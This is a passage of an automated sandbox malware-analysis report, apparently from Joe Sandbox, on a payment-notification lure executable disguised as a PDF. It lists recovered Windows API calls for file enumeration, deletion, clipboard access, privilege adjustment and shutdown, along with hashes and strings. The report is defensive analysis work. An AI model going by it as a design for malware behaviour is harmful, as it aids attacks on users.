                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload
                                                                                                                              • String ID: $@OH$default$winsta0
                                                                                                                              • API String ID: 4266742174-3791954436
                                                                                                                              • Opcode ID: 4e98c88b9245643552b14ed8f448a3d9b1cfef3e0a604fb144d2254d890e0981
                                                                                                                              • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                                              • Opcode Fuzzy Hash: 4e98c88b9245643552b14ed8f448a3d9b1cfef3e0a604fb144d2254d890e0981
                                                                                                                              • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                              • String ID: *.*
                                                                                                                              • API String ID: 1409584000-438819550
                                                                                                                              • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                              • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                                              • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                              • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe,0040F545,C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe,004A90E8,C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe,?,0040F545), ref: 0041013C
                                                                                                                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Find$CloseCopyDeleteMove$AttributesFirstFullNameNextPathlstrcmpi
                                                                                                                              • String ID: \*.*
                                                                                                                              • API String ID: 2518010859-1173974218
                                                                                                                              • Opcode ID: 7a8d5f8610d379da30b712c8117f4eed38144bb63bbd26685d4741f30de440db
                                                                                                                              • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                                                              • Opcode Fuzzy Hash: 7a8d5f8610d379da30b712c8117f4eed38144bb63bbd26685d4741f30de440db
                                                                                                                              • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                                                                              APIs
                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FolderPath$LocalTime
                                                                                                                              • String ID: %.3d
                                                                                                                              • API String ID: 87575609-986655627
                                                                                                                              • Opcode ID: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                                                                                              • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                                              • Opcode Fuzzy Hash: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                                                                                              • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                                                • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                              • String ID: *.*
                                                                                                                              • API String ID: 2640511053-438819550
                                                                                                                              • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                              • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                                              • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                              • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                                              APIs
                                                                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateDirectoryFullNamePath
                                                                                                                              • String ID: :$\$\??\%s
                                                                                                                              • API String ID: 2531775907-3457252023
                                                                                                                              • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                              • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                                              • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                              • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                                              • GetLastError.KERNEL32 ref: 00433414
                                                                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                                              • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                              • API String ID: 2938487562-3733053543
                                                                                                                              • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                              • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                                                              • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                              • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                                                • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                                                • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                                                • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1255039815-0
                                                                                                                              • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                              • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                                              • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                              • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileTime$FindLocal$CloseFirstSystem
                                                                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                              • API String ID: 3238362701-2428617273
                                                                                                                              • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                              • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                                              • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                              • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                                              • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                                              • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                              • API String ID: 4194297153-14809454
                                                                                                                              • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                              • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                                              • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                              • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1737998785-0
                                                                                                                              • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                              • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                                              • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                              • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                                                              APIs
                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                                                • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                                              Strings
                                                                                                                              • Unterminated string, xrefs: 00428348
                                                                                                                              • Error opening the file, xrefs: 00428231
                                                                                                                              • _, xrefs: 0040371C
                                                                                                                              • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharCurrentDirectoryMultiWide$FullNamePath
                                                                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                              • API String ID: 522955547-188983378
